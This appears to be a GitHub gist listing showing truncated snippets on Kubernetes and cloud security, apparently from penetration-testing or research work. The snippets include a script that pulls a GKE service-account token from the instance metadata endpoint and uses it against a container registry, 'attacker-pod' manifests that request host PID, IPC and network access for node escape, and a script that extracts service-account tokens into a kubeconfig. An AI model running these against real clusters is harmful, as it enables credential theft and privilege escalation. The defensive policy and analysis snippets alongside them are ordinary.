View gke-pod-hacks.sh
# Get temporary access token using Google Cloud instance metadata | |
export TOKEN=$(curl -sk -H "Metadata-Flavor: Google" \ | |
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token | \ | |
jq -r '.access_token') | |
# List all repo from Google cloud registry using access token | |
curl -u "oauth2accesstoken:$TOKEN" https://eu.gcr.io/v2/_catalog | |
# Docker login | |
echo $TOKEN | docker login --username oauth2accesstoken --password-stdin eu.gcr.io |
View go-int-down-casting.ql
import go | |
import semmle.go.dataflow.DataFlow | |
import semmle.go.dataflow.TaintTracking | |
class IntegerSource extends Function { | |
IntegerSource() { | |
this.hasQualifiedName("strconv", "Atoi") or | |
this.hasQualifiedName("strconv", "ParseInt") | |
} | |
} |
View ghidra.sh
ghidra () { | |
del_stopped ghidra | |
xhost +local:root | |
docker run --init -it --rm --name ghidra --cpus 2 --memory 4g -e MAXMEM=4G -v /etc/localtime:/etc/localtime:ro -v /tmp/.X11-unix:/tmp/.X11-unix -v "${HOME}/.gtkrc:/root/.gtkrc" -e "DISPLAY=unix${DISPLAY}" -v /home/user1/Work/ghidra/conf/.ghidra:/root/.ghidra -v /home/user1/Work/ghidra:/root/storage blacktop/ghidra | |
xhost -local:root | |
} | |
ghidra |
View psp.yml
apiVersion: policy/v1beta1 | |
kind: PodSecurityPolicy | |
metadata: | |
name: developers-psp | |
spec: | |
privileged: false | |
allowPrivilegeEscalation: false | |
hostNetwork: false | |
hostPID: false | |
hostIPC: false |
View pod-to-node.yml
apiVersion: v1 | |
kind: Pod | |
metadata: | |
labels: | |
run: attacker-pod | |
name: attacker-pod | |
spec: | |
hostPID: true | |
hostIPC: true | |
hostNetwork: true |
View sa-to-kubeconfig.sh
#!/bin/bash | |
export TARGET_CONFIGSERVER=$(kubectl cluster-info | grep master | awk '{print $NF}' | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g') | |
export TARGET_TOKENNAME=$(kubectl -n developers get sa developer-sa -o jsonpath='{.secrets[0].name}') | |
export TARGET_CONFIGTOKEN=$(kubectl -n developers get secret $TARGET_TOKENNAME -o "jsonpath={.data.token}" | base64 -d) | |
export TARGET_CONFIGCRT=$(kubectl -n developers get secret $TARGET_TOKENNAME -o "jsonpath={.data['ca\.crt']}") | |
cat <<EOF | |
apiVersion: v1 | |
kind: Config |
View k8s-sa-pod-crud.yml
apiVersion: v1 | |
kind: Namespace | |
metadata: | |
name: developers | |
--- | |
apiVersion: v1 | |
kind: ServiceAccount | |
metadata: |
View pod-node-access.yml
apiVersion: v1 | |
kind: Pod | |
metadata: | |
labels: | |
run: ubuntu-1 | |
name: ubuntu-1 | |
spec: | |
hostPID: true | |
hostIPC: true | |
hostNetwork: true |
View mongo-api-client.js
'use strict' | |
const MONGO_ATLAS_USERNAME = 'USER' | |
const MONGO_ATLAS_APIKEY = 'APIKEY' | |
const MONGO_ATLAS_STAGING_GROUP_ID = 'ID1' | |
const MONGO_ATLAS_PRODUCTION_GROUP_ID = 'ID2' | |
const MONGO_ATLAS_EVENTS_API = 'https://cloud.mongodb.com/api/atlas/v1.0/groups/{{GROUP-ID}}/events' |
View gist:3ef7f1e208d46771cb79b6440028b787
GET /api/v1/namespaces/mynamespace/pods/cool-79b76569d9-wxsvs/exec HTTP/1.1 | |
Authorization: Bearer $TOKEN | |
Host: 192.168.12.10:6443 | |
Connection: upgrade | |
Upgrade: websocket |
NewerOlder